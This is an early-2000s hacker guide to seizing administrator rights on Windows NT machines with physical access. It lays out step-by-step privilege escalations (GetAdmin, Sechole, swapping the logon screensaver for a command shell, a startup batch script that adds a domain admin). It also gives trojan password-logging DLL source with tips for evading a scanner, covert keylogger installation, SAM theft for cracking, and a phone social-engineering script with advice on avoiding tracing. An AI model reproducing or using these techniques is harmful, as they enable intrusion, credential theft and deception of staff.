Getting Admin

by Cra58cker

DISCLAIMER: I, CRA58CKER, PUT THIS GUIDE TOGERTHER. THIS GUIDE GOES OVER THE MAIN ATTACK METHODS A HACKER OR A PISSED OFF EMPLOYEE WOULD USE TO "0wNing" THE NETWORK IF THEY HAVE PHYSICAL ACCESS TO THE MACHINE. THESE EXPLOITS HAVE BEEN TAKEN FROM ALL OVER THE WEB (SO THEY WORK ON VARIOUS PLATFORMS OF WINDOWS NT) AND IF YOUR EXPLOIT (S) IS ON HERE YOU SHOULD GET CREDIT AT THE END OF THE FILE. IF YOU DON'T EMAIL ME!!! IN THIS TEXT FILE I HAVE WRIT TWO EXPLOITS (IF YOU CAN REALLY CALL THESE EXPLOITS) THE REST WAS TAKEN FROM THE WEB, BOOKS, NEWSLETTERS AND THE IRC CHANNEL #HACK. FEEL FREE TO SHARE THIS GUIDE AROUND! BUT! IT MUST REMAIN UNCHANGED AND MY NAME MUST REMAIN WHERE IT IS, IF YOU PRETEND YOU WROTE THIS GUIDE THEN YOU ARE A LAMER! AND NEED TO GET A LIFE!

IN THE FUTURE I WOULD LIKE TO SEE THIS GUIDE FLOATING ABOUT ON ALL HACKING\CRACKING\SECURITY\SCRIPT KIDDIES WEBSITES. AND NOW THE BORING DISCLAIMER

"I AM NOT TO BE HELD RESPONSIBLE FOR YOUR ACTIONS AFTER READING THIS GUIDE, WEATHER IT BE WORLD WAR, SUSPENDED FROM SCHOOL, DEATH, VIOLENCE, GETTING SEWED ETC BLABLBALBLABLBLAB BASICALLY THE LINE IS THIS

I'VE TOLD YOU HOW TO HACK A WINDOWS NT BOX THAT YOU HAVE PHYSICAL ACCESS TO BUT I NEVER SAID DO IT! I JUST TOLD YOU HOW...

Welcome to the second paper of "The White Paper Series”, the first paper was entitled "Cracking SAM" you can pick it up in the tutorial section at www.astalavista.com. If you don't know all ready, White paper series is a collection of papers all about Hacking\Protecting Windows NT....

In this paper I plan to go through a few methods that Hackers (Including me!) use to get Administration Privileges on a Windows NT workstation when they have physical access to the machine.

If you want to know "How do I hack a Windows NT box from the internet?" then you are going to have to wait, I'm afraid until the next text file comes out :), ok enough talk on with the show...

PURPOSE

This guide is written for the average Hacker, Cracker and System Administrator. I writ this guide so Administrators (And Hackers) have a good understanding of the security on a Windows NT Box. This guide was not written for Good nor Evil, it was written purely for people to developed there knowledge further on a Windows NT Box, so as I said if you abuse this knowledge and end up going to court don't bring my name into it, I told you how to do it but I never said do it...

If you are more interested in actually Hacking into a NT box remotely then you will have to wait until the guide entitled "The Ultimate Hackers Handbook to Hacking Windows NT" comes out. I hope you learn something from reading this text file even if you are a Linux\Unix fan. I know there are properly spelling mistakes and bad use of grammar in this guide but I don't really care providing it's readable who really does care?

NOTE: THE BOX YOU ARE PENERTRATING IS A WINODWS NT WORKSTATION 4.0 BUT THIS REALLY DOESN'T MATTER, IT ALL DEPENDS ON HOW UPDATED THERE PATCHES ARE (YOU WILL SEE WHAT I MEAN WHEN YOU READ ON)

Starting Point

So what would make an excellent penetration attempt? Getting your hands on a copy of the SAM (Security Account Manager) and then running the latest version of L0phtCrack against it. So firstly you would look in the WINNT\REPAIR and if there is a copy of SAM, copy it to a formatted floppy disk and leg it out the building, then when you get home load it into your home version of L0phtcrack feed in a bunch of wordlists and dictionary files, turn on the TV watch an episode of Buffy The Vampire Slayer and once that is finished check L0phtCrack and you would have uncovered about 60 odd passwords including the Admins! Hurray mission accomplished, easy, hey?

But what if a copy of the SAM isn't there? Well it looks like your going to have to get Admin privileges and this is what the guide is here for...

EXPLOIT 1 - GETADMIN.EXE

Ok now before I explain to you what "GetAdmin" actually is, I think I better just tell you that this exploit was programmed\writ in 1997 the time of writing this the year is 2003 so if this exploit actually works on your system you should really look for updates because you need service, anyway on with the exploit.

A very clever person called Konstantin Sobolev wrote the program; so all credits go to him. Since this is his program it's best that he explains how it works...

"This program can get administrator rights without any special privileges. Simply run GetAdmin or GetAdmin account_name from the command line. If you do not enter account_name current account will be used.

The bug is in the subfunction of NtAddAtom, which does not check an output address. So it's possible to write into kernel memory. Of course it's not necessary to inject DLL into winlogon to get admin rights. You can simply replace some part of ntoskernel or replace process token and etc. If you'd like to get the full source code, please click here.

Preventing the Attack

Only one real way: patch ntoskernel and replace function NtAddAtom so it checks for valid address.

You can remove all access from ntoskernel but it's possible to take into account in the fixed address of the NtGlobalFlag in the GetAdmin program. So another ways to get administrator rights exists if you can write to the kernel memory."

Now if you didn't really take any of that in here is STEP-BY-STEP guide to executing the program... NOTE IT DOESN'T WORK ON ALL VERSIONS OF NT!

STEP 1

The file is a Zip format so unzip it with a unzipping utility called WinZip...

STEP 2

Extract the files to any directory, which you have read and write access.

STEP 3

Locate the directory to where you unzipped the files and check that you have the following files...

GetAdmin.exe - The file you will be executing

GASYS.DLL - The file, which injects itself into GetAdmin.exe

STEP 4

Load up Cmd.exe (The DOS B0x)

STEP 5

Change to the directory where the two files are located

STEP 6

Execute the GetAdmin.exe by typing Getadmin.exe Account_Name

E.g. If I was logged in as Michelle Trachtenberg I would type...

GetAdmin.exe Michelle Trachtenberg

You should then get a message, which says something like "Congratulations, Michelle Trachtenberg has Admin rights!" If this happens log out then login as Michelle Trachtenberg (Or whatever account you were in) if this doesn't happen go to step 7

STEP 7

Wait....

The screen will freeze for a while and perhaps may even crash! So reboot the machine and log in as Michelle Trachtenberg (Or whatever your account name is)

STEP 8

Bingo! You should have Admin rights! You can do anything you want! I advise you Download L0PhtCrack and some wordlists and launch them against the remote machine. Then hide the Application and get on with some work!

An Hour later you should have recovered about 30 - 50 passwords (All depends on how strong the passwords are and where you downloaded the Dictionary Files from.

Now for all you really clever people and top notch programmers here is some of the source code to the program GetAdmin.exe....

How it works?

Here is the main string that has done all in GetAdmin:

ChangeNtGlobalFlag(GetNtGlobalFlagPtr()); After that you can open any process in the system, because function NtOpenProcess does not checks for a SE_DEBUG_PRIVILEGE when bit in NtGlobalFlag+2 is set. Aftermore, program injects DLL in the winlogon process. Winlogon is running under the SYSTEM account so it can add / remove user in the Administrators group.

Function ChangeNtGlobalFlag:

BOOL ChangeNtGlobalFlag (DWORD NtGlobalFlag)
{
DWORD callnumber = 0x3; //NtAddAtom
DWORD stack [32];
int i;
DWORD handle=0;
CHAR string[255];
If (! pNtGlobalFlag) return 0;
Stack [0] = (DWORD) string;
Stack [1] = (DWORD)&handle; //pNtGlobalFlag;
For (i=0;i ‹ 0x100;i++)
{
sprintf(string,"NT now cracking... pass %d", i);
If (handle & 0xf00){
Stack [1] = (DWORD) pNtGlobalFlag+1;
}
__Asm {
mov eax, callnumber;
mov edx, stack;
lea edx,dword ptr [stack];
int 0x2e;
}
if( stack[1] == pNtGlobalFlag+1) break;
}
Return TRUE;
}

If you are an Admin and this Exploit worked then go to www.microsoft.com and look for a GetAdminFix.exe or go to a search engine and type in "Download patch for GetAdmin.exe"

If the Exploit didn't work you either...

1. Have a patch for it already (Well done)
2. The GetAdmin exploit isn't compatible with your version of windows.

Ok on with the next Exploit...

HACKERS TIP: IF THE EXPLOIT DIDN'T WORK TRY DOWNLOADING A PROGRAM CALLED CRASH.EXE, RUN THIS PROGRAM FIRST THEN RUN GETADMIN, YOU SHOULD BE THEN ADDED TO THE ADMIN GROUP....

EXPLOIT 2 - SECHOLE.EXE

Ok again, this one is fairly old but it came out after getadmin.exe so if getadmin.exe didn't work for you this one should. Ok this sechole.exe is basically another admin attack and this is how it works, this was taken from the readme file of the sechole.zip...

Another GetAdmin attack -- Lets any user become admin user instantly!!

Attached are the README file, executable and the DLL which demonstrate The NT Security hole.

Steps to follow: You need to have a machine running Windows NT 4.0 or 5.0beta, either workstation or server will do.

1. Login as any non-admin user on the machine (even guest account will do). (You may verify that the logged in user does not possess admin privilege At this time by trying to run the "windisk" program from the shell. This should fail since the user does not have admin privilege).
2. Copy the attached files: SECHOLE.EXE and ADMINDLL.DLL onto your hard disk In any directory, while logged in as the above non-admin user.
3. Run SECHOLE.EXE. After this your system might become unstable or even Hang. The damage is already done by this time. Simply reboot the machine. You will see that the non-admin user now belongs to the administrator Group. This means that the user has complete admin control over that Machine. Now you will be able to run programs like "windisk". Another Way to verify newly acquired admin privileges is to run the "User Manager" from the "Administrative Tools".

In my opinion this bug is very difficult to fix. I plan to write About it in our upcoming book "Undocumented Windows NT" which is yet to be Published and talks about a host of undocumented calls that Microsoft Uses. Something every serious programmer must have.

Right, there is nothing really else to say about that exploit, its quite simple to understand and execute, so I'll let you work the rest out.

EXPLOIT 3 - BATCH HACKING

One day I was just messing about with the BATCH language and I found an exploit that could actually help you get Admin access. Now when you see this exploit you may think "That's pretty old and was discovered ages ago" BUT I writ this in the space of 10 minutes and it worked like a charm :) First I will give you the actual source code for the BATCH script then I will write out simple steps on how to use it.... To pull of this Hack simply log in as guest.

COPY HERE

echo off
Net user %user% pass /active /domain /add
Net local group Administrators %user% /add
Net group "Domain Admins" %user% /add /domain
Net group "Guests" %user% /delete /domain

STEP-BY-STEP GUIDE TO USING THE "HACKING BATCH SCRIPT"

STEP 1

Open up notepad

STEP 2

Copy and paste the above script into the notepad

STEP 3

Then "Save As” then saves as XXXXX.BAT (XXXXX being the name of whatever you want to call it) And save it to the following directory....

WINNT\Profiles\All users\Start Menu\Programs\Start-up Folder

Bingo! At the next Administration Login, the user would gain privileged access to the system and the domain.

NOTE: IF YOU ADMIN IS A PRO THEN HE\SHE WOULD HAVE DISABLED CERTAIN NET COMMANDS AND MAY EVEN BLOCK ACCESS TO THE STARTUP FOLDER! BUT THIS SCRIPT IS WORTH A SHOT :)

EXPLOIT 4 - REPLACING LOGON

I was browsing the underground and I came across a simple text file written by well I didn't get his name he didn't leave it but if he is reading this now email me and I can give you the proper credit you deserve, ok? The text file I discovered gives a rather simple way of getting ADMIN! Priviliges here is how you do it.

If you can log in as an account, drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)

C:\> cd \winnt\system32 
C:\winnt\system32> copy logon.scr logon.scr.old 
C:\winnt\system32> del logon.scr 
C:\winnt\system32> copy cmd.exe logon.scr 

Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to C:\> net user administrator And then log in with the new account.

Try this, might work, and as long as he\she didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.

Heh, there you have it another, very easy way to get Admin! BUT remember once you have changed the password to the administrators account make sure you sort out the screen saver mess and change it back to how it was, or otherwise it's going to happen to you! Yeah, I know it's a vicious circle!

HACKERS TIP: IF YOU DON'T WANNA RISK LOGIN IN AS ADMIN AND CHANGING THE PASSWORD, WELL SINCE YOU HAVE A DOS BOX WITH FULL SYSTEM RIGHTS, SIMPLY RUN THE "RDISK" COMMAND AND CREATE A EMERGENTCY DISK TO THE A:\, THE EMERGENCY DISK WILL CONTAIN ALL THE IMPORTANT FILES WINDOWS NT NEEDS TO LOAD, INCLUDING THE SAM! BUT THERE IS A CATCH THE SAM WILL ONLY HAVE ADMIN AND GUEST! SOMETIMES IT ONLY HAS GUEST SO BECAREFUL :(

EXPLOIT 5 - KEY LOGGING

I was actually wondering if I should include this Hacker technique and NT exploit because it is a tad lame! And I don't really know if it fits in as getting Admin, but anyway I suppose I better explain how this one works... You all know what a key logger is right? , Well it's a piece of software which gets stored on the victims computer and logs all keystrokes to a "Hidden" file and sometimes it's password protected so only the person who installed the key logger can view\add\edit\uninstall the key logger. There are two main types of Key loggers there are Hardware Key loggers and Software Key loggers.

HARDWARE KEYLOGGERS - A hardware key logger is a piece of equipment which gets plugged into the back of the PC and then gets linked up with another PC, And what ever gets typed on the first PC it shows up on the other PC, it's kind of obvious when you think about it. Here is another example of a Hardware Key logger; Imagine a normal keyboard the usual type the one which you plug in the back of your PC. Well, there are "Special" keyboards, which look identical to a normal keyboard but only it, Logs ALL keys that are pressed and stores them in a file, which the attacker or concerned parents specify. Some hardware key loggers come with software and other ones don't, well this file isn't about key loggers so just look around yourself, and be careful you could be being logged right now... :)

SOFTWARE KEYLOGGERS - Yeah you guessed it, a software key logger is a form of a program. Which as I said above gets installed secretly on the PC and then all keys are logged to a hidden file and the file is password protected so if you discover it and try to delete it you will be prompted with a password box. To be honest it is actually quite scary because Key loggers are now pretty advance and contain advance features such as...

1. LOG all Yahoo! MSN, AIM conversations.
2. LOG all screenshots
3. LOG all websites visited
4. LOG all applications ran
5. LOG all passwords.

And what is even more scary is that some key loggers contain "Remote logging” which means that an attacker can bind the key logger with another exe file(s) and sent it via email all keys are then sent to the attacks PC over email.

Well I went to www.google.com and was looking very quickly at Windows NT loggers and let me tell you there are loads! So browse around and see what you can find, however I do recommend looking for one called "Blazing Tools Perfect Key logger" since it has allot of advance features and can be installed remotely which means that you can combined the key logger with an exe file (As I have mentioned above) and when the victim runs the exe file the key logger is stealthily installed! On there PC (You send it via email) Then all the key log information goes to your email account in the form of *.log files. This is pretty cool, you can also set the key logger to boot up at the very start up therefore you can catch network passwords including the Admins!!!

Anyway as I said it is a bit lame and it's not guaranteed to work 100% But I'm sure if you send one to the [email protected], you could come across quite allot of interesting things such as MSN passwords, Yahoo account information etc BUT this is script kiddie behaviour! BUT then again it could get the job done pretty quickly...

Anyway to finish this section I'll tell you about "Blazing Tools Perfect Key logger" features...

• Can be absolutely invisible
• Visual surveillance (screenshots)
• Logging texts typed in every application
• Websites logging
• Clipboard logging
• Sending log and screenshots by e-mail in the hidden mode
• Stealth uploading logs by FTP
• Remote installation
• Log file is encrypted and can be protected with a password
• Monitoring all users of the PC, even if you don't know their passwords
• Easy log viewing and management
• Export log to HTML format
• Possibility to specify target applications
• Supports all Windows versions, including Windows XP
• Very easy to use
• Low price

If you manage to get Admin you may want to take the key logger one step further by Stealing everyone else is password you can do this in the following steps...

1. Install and configure key logger on the administrator's PC
2. Copy key logger’s folder contents (by default - Program Files\BPK) to any folder on the remote computer.
3. Click Start > Run and type regedt32
4. Choose File > Connect to computer command (this command can be written different in the different versions of Windows)
5. Connect to the PC you have chose and open HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run registry branch
6. Add REG_SZ entry with any name and value = full path to bpk.exe (key logger’s executable)
7. On the next Windows start-up key logger will start its work

EXPLOIT 6 - RDISK

Ok, I'm going to be honest this worked once for me and that’s it! So don't be surprised if this doesn't work at all.

Anyway we all know the DOS command "RDISK" basically if you read the Hackers tip above your realise that when you run this command it produces a Emergency boot disk, now let me explain that on this disk all the important main start-up files are copied including the SAM. However the only accounts on there will be Guest and Administrators (Possibly).... So follow these steps... to pull of this hack...........

STEP 1

Login as anyone who has access to the cmd.exe

STEP 2

Run the DOS B0x and then type the command "RDISK" (make sure you are in the Winnt directory.)

STEP 3

Pop in a floppy disk when it tells you (You will get a warning that the floppy disk will be formatted simply go ok)

STEP 4

Sit back and relax and let it copy all the main files to the disk.

STEP 5

Nick the disk! And when you get home import the SAM file from the disk and run L0phtcrack against it... AND HOPEFULLY THE ADMIN ACCOUNT WILL BE ON THERE BUT NO! PROMISES!

NOTE TO ADMINS: YOU CAN AVOID THIS BY DISABLING THE RDISK COMMAND

EXPLOIT 7 - MY FRIEND PETER

THIS EXPLOIT WAS TAKEN FROM "The Unofficial NT Hack FAQ"

And this is pretty Advance so if you are new to Windows NT security\Hacking I would give this Exploit a miss and come back to it later...

Use the Offline NT Password Editor by Petter Nordahl-Hagen. You need to Download Petter's code to your Linux machine (you DO have one of those, Don’t you?) And compile it using a libDES and MD4 library. Now mount the NT drive read/write and follow the instructions in the readme. The Instructions are pretty easy to follow, especially if you know enough to get To the point to use them ;-)

Actually, to make things easier, Petter has built a bootdisk image that Step you through the entire thing. I'll be the first to admit that Petter's Code is as dangerous as hell, but it does work and I had no problems. YMMV.

Consider using GetAdmin.exe (section 04-5) and go from there if you are too Paranoid or fearful of booting up Linux to get to an NT machine

EXPLOIT 8 - %SYSTEMROOT%\SYSTEM32 BEING WRITABLE

Again, This exploit was taken from the "The Unofficial NT Hack FAQ" by Simple Nomad, and I found this exploit quite successful when trying to steal network passwords, the only downside to this is that good AV (Anti-Virus) will pick this exploit up quite quickly if you don't compile it very well, But never the less you might as well have a shot...

Well, this can be exploited on NT 4.0 by placing a trojaned FPNWCLNT.DLL In that directory. This file typically exists in a Netware environment. First compile this exploit code written by Jeremy Allison ([email protected]) And call the resulting file FPNWCLNT.DLL. Now wait for the user names and Passwords to get written to a file in \temp.

------------- Cut --------------

#Include 
#include 
#include 

struct UNI_STRING {
USHORT len;
USHORT maxlen;
WCHAR *buff;
};
static HANDLE fh;
BOOLEAN __stdcall InitializeChangeNotify ()
{
DWORD wrote;
fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
0);
WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
return TRUE;
}
LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,
struct UNI_STRING *passwd)
{
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;
memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "User = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
sprintf(buf, "RID = %x\n", rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
return 0L;
}

------------- cut --------------

If you load this on a Primary Domain Controller, you'll get EVERYBODY'S password. You have to reboot the server after placing the trojan in %systenroot%\system32.

ISS (www.iss.net) has a security scanner for NT which will detect the Trojan DLL, so you may wish to consider adding in extra junk to the above code to make the size of the compiled DLL matches what the original was. This will prevent the current shipping version of ISS's NT scanner from picking up the Trojan.

It should be noted that by default the group everyone has default permissions of "Change" in %systemroot\system32, so any DLL that is not in use by the system could be replaced with a Trojan DLL that does something else.

EXPLOIT 9 - ACCESS CONTROL LIST AB(USE) BY ME!

In every Windows NT box there are files, directories and an ACL (Access Control List) . Each user and group has a SID (Security Identifier), and when a user attempts to read or write to a file the access is checked against a list of access-control entries inside the ACl. So the Guest account for example wont is allowed to do as main things as the Administrator (Obviously) because of the ACL. Here is a list of the flags controlling ACL for files and directories....

FLAG                          DESCRIPTION
------                        -------------
N                             No access
R                             Read
W                             Write
X                             Execute
D                             Delete
P                             Change permission
O                             Ownership
An                            All
RX                            Directory File/Scan
WX                            Directory

So how does this bit of Knowledge help you get Admin? well, think about it you are limited to do a certain number of things because of your ACL and SID so if you could perhaps edited your SID your ACL will be altered, confused? well don't worry cause I will take you through the steps of the methods that have worked for me (Note: I am writing this from personal experience so don't blame me if whatever I say it turns out totally different!)

To pull of this Hack I suggest you get the following tool(s) (If you don't have access to them already) These are the tools I used to "unset my flags" and to modify the access control entries inside the ACL.

GRANT

REVOKE

SETOWNER - This is the tool I use the most because it gets the job done nicely :)

Once you have downloaded these tools, note the directory to where you have saved them. Now open up a DOS B0x and change to the directory of where they are located. I suggest you first run SETOWNER.EXE (If you can work this one you can mainly work all of them) ok now once this is done your get something like........

Setowner 1.1 something, something copyright Arne Vidstorm. So straight away you can see that there aren't that many options so this program is quite simple to use, just remember one key thing.......

Setowner [Domain\Account]

So lets do some examples, say for instance we wanted to find out who owned the file Diary.txt we would simply type.........

Setowner PATH OF FILE! e.g. C:\files\file.txt

and then you would get something like.........

The File owner is: OWNER OF FILE E.G

The File owner is: Michelle Trachtenberg

Pretty simple huh? Basically all we have done is selected a file and found out who owns it. Now lets move on to more actual Hacking (Well, sort of)

Say for instance that one of the "Employees" (Including the Administrator) has a file that you want and you know the Hardcore path a simple command with the Setowner can easily make you 0wn the file the command is this...

Setowner HARDCORE PATH OWNER e.g.

Setowner C:\Files\Diary.txt Michelle Trachtenberg

What would happen is that Michelle Trachtenberg would be the 0wner of "C:\Files\Diary.txt" , understand? It's really simple her the Setowner program even includes examples so you should have to trouble using it.

So there you have it another way to...

Ok, ok this little exploit may not get you Admin but it can take advantage of the whole "ACL" so basically you can own files, which don't actually belong to you! So if the Admin was really stupid!! they would place a copy of the SAM (The one which they made from the RDISK) into another directory (Don't ask me why? I said if they were stupid) and that’s where you will pick it up with your new toy :)

So basically use Setowner or Revoke etc to poke around and 0wn other Employee's files and if you are really lame you can go up to there face and say...........

"y0 1'm a Hax0r and 1 jUsT 0wned ur Phile!" HAHAHHAHAHAH

Well anyway that’s if you are lame....... Let's move on..........

EXPLOIT 10 -SNIFFING

I will make this section short since Sniffers are very advance and I would have to write a whole guide on the subject. I will get straight to the point, as you know a Sniffer is used to monitor network traffic and debug bad CGI code or look for some form of bug in a server or network. However they can also be used to catch 100's of network passwords. How?

Well if you think about it a sniffer is recording and logging all the traffic which passes through the network and that means when someone logs on to the network there user and pass would be logged as traffic. So if you arrived early at work and installed a sniffer and configured in correctly all you have to do is wait and watch the packets of data get logged into the sniffer and bingo! you could end up having half of the network passwords even the Administrators! BUT it's not that easy because Sniffers aren't really that easy to set-up and install and some networks are configured totally different to the sniffer, so the sniffer could end up sniffing just boring old traffic and isn't logging the traffic from the correct network adapter. Also, the fact is that you need to examine the logged data bits carefully because you wont get some like this...

User: Michelle Trachtenberg

Password: Hackerzrock

You’re either get something like this.........

$%TFR&&HB124T**User:MichelleTrachtenberg*&*(PLH&Y
^^&&^^&&^T^TBBUUJNIUMJPass:Hackerzrule*((OI()I(I
*U*U*HHH ^T^&T^&^&^JU*I(*UU&*Y&Y&Y&TT^^&^&&^^^&^&^T^&
GET\cgijhyunHNYBYHYYHYHYHYHYHB^^&*&*&*(8788772817828127

Or if the sniffer is programmed to dump the logs in a Hex format it will look something like this......

00 0 00 0 0 00 0  0 02332  0 030303 0      .............................
098 77 66 55 4 3 3 2 4 3 34 4 5 4 3 3      .............................

(You would then need to convert this to Text)

In conclusion sniffers are very powerful and dangerous and if configured and set-up correctly, the Hacker could be rolling in passwords and personal email messages.

If you plan to actually get Administration privileges using a sniffer my advice is to read as many text files on Sniffers as possible, learn how the network is set-up then download a bunch of Sniffers and experiment with them and see which one suits you, there are millions of Sniffers out there and its up to you to decide which one suits you. It's best to get a freeware one, which has a nice GUI and has many features as well as being highly configurable. Well that’s all there is to say on Sniffers and remember your only capable of hacking the system if you know how the system works.............

EXPLOIT 11 - SOCIAL ENGINEERING

As the final exploit to this guide I am going to end up talking about Social Engineering. What is social engineering? well the nice way to put it is pretending to be someone your not but the real way is basically bullshitting!

You have to pretend to be someone your not, remember that. For example I'm sure you have all heard of the legend Kevin Mitnick (The Super Hacker some might say) now don't get me wrong because Mitnick was one of the best hackers and was very clever BUT he was known as the "Master" of Social Engineering so he spent allot of his time getting to know people and tricking them to give out secret information such as Passwords and weakness’ in the system he wished to Hack.

I've mentioned Kevin just in case you kiddies out there start thinking "Hahah that will never work, no one is that dumb!" all I can say to that is "LOOK AT KEVIN MITNICK".........

Ok now for some social engineering examples.......

*NOTE: REMEMBER THESE NEVER REALLY HAPPENED BUT THESE WORK.......

H = Hacker

MT = Michelle Trachtenberg (The receptionist at www.victim.com)

Picture the scene you are calling from a pay box and Michelle Trachtenberg is at her reception desk and it is Monday morning.

Hacker has done his homework so he knows a bit of info about the company.

Hacker dials number.........

RING , RING........... RING...... MT: Good morning, welcome to Victim, how may I help you?

H: Oh hello, I'm the Computer Technician and I was called late last night by your manager and he asked me if I could take a look at your Windows NT workstations, he says your having trouble.........

MT: Ok can I have your name please?

H: Yes my name is Mike Jones

MT: And what company do you work for?

H: I work for the company XYZ Inc....

MT: What was the name of the manager who contacted you?

H: I don't mean to be rude lady, but I have allot of work to do today and I would gratefully appreciate it, if you would please put me through to your Administrator.

MT: Ok, ok I'm sorry but I need to ask these questions for security reasons, you must understand that?

H: Yes, I do but I'm sure you have allot of work to do and don't really want to cause any trouble for Me or your company so please would you put me through to your Administrator.

MT: Ok. Please hold....

Michelle puts the call on hold and calls up the Administrator......

ADMIN: hello

MT: Oh hi Tom, A Mike Jones would like to talk to you.

ADMIN: Mike Jones?

MT: Yeah he says he is a Computer Technician and was phoned late last night because down at the offices you are having trouble.

ADMIN: Mmmm I don't recall any trouble but lately the Email servers have been playing up so maybe that is why he was called, put him through Michelle.

MT: Ok

Michelle puts Hacker through..........

ADMIN: Hello?

H: Hello I'm the computer Technician and was called late last night because you are having trouble with your workstations.

ADMIN: Oh hello, I wasn't actually expecting anyone since that we haven’t really had any trouble lately... But you can never be too safe, Heh ok what can I do for you?

H: Could you please create me an account and add me to the local administrator group. If I'm going to take a look at your Workstations it's best I can view them inside out.

ADMIN: Sure, your user will be "Mike.J" and your Password will be...... "PcRePAIR".

H: Ok thanks

ADMIN: Give me 10 minutes to set up your account and once you are done phone Michelle so you can talk to me and let me no what's wrong I will then remove your account, ok? Have a nice day

H: Heh, Sure will and yes I feel that this is going to be a very Good day...

HANGS UP PHONE AND NOW 0wns the network!

There you have it and that is how easy it is to get Admin access by Social Engineering. Let's just go over a few basic skills....

1. Sound professional don't use slang
2. If the Receptionist challenges you, use a firmer tone and complain about your heavy workday.
3. Have a name and company ready and even a member of staff of Victim.com
4. If you are Fucking up badly! Hang up and run!
5. Always use a Payphone you don't want to risk being traced.
6. Be confident, don't hesitate

FINAL WORDS

So there you have it, 11 ways to get Admin privileges on a Windows NT box (Well sort of Admin) when you have physical access to the machine. Personally I can't see these exploits working on places like the NAVY, AMRY, NSA etc But these exploits could help you get admin on places like High School, Universities etc And to all the fellow Administrators out there I warn you now if you fall out or give a employee(s) are hard time you could end up regretting it and be looking at a massive pay loss. My advice to prevent this is pretty simple "Have a good relationship with your fellow employees" . New exploits for Windows NT are discovered all the time so make sure you update your systems with the latest patches and hot fixes and you should be ok. I think you should try all these exploits (Well, the ones you can) on your system and see which ones get you Admin access, therefore you know which patches to update.

Thanks for reading, and I hope you learnt something from reading this. If you are having trouble finding these exploits just wait a couple of moths and before you know it I will be releasing a "Exploit Pack" for windows NT, it will contain all the Exploits you have read in the guide. Well take care and have fun (Or Phun as the Hax0rs would say)

peace out and remember with great power comes great responsibility...

CREDITS

Konstantin Sobolev
The whole of Simple Nomad
Cra58cker
The whole of Cra58cker's Lab
Blazing Tools
Michelle Trachtenberg
NT Security
L0phtCrack (now known as @Stake)
Dr -K
Astalavista security team
NT Security
Petter Nordahl-Hagen
Rhino9 Team
HDC
Authors of Sechole.exe

Shout outs and Greetz

Greetz to all my fellow Hackers out there!

Fat Pulse
Cracker03
Virus1824
Ps69pher
Cense
Rizzy
All my fellow Totse members!
Hax0r
The LAN God
Lord Dredd (Are you still around?)
Mobman (Never met you, but you made the best Trojan ever!)
CdC (Never met you either, but you made the best Windows 9X and NT Trojan)
kM
Abhisek Datta
Ankit Fadia
@om (Atom)
J0n3sy
P0u1 (Paul)
Emz
Parma
Bdp702
Whole of the Tigertools team
And all the crazy bastards I left out!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

CONTACT

Feel free to contact me any time (I always reply back) to

[email protected]

Greetz, credits, Flames (I hope not!)

Or post a message at www.totse.com in the Hacking\Networking section :)

+Peace+

COMING SOON

Files -

Exploit Pack - All the Exploits for Windows NT

Cracked - All the SAM dump utilities Text files - "Hacker Michelle Trachtenberg"

"The ultimate Hackers Handbook to Hacking Windows NT"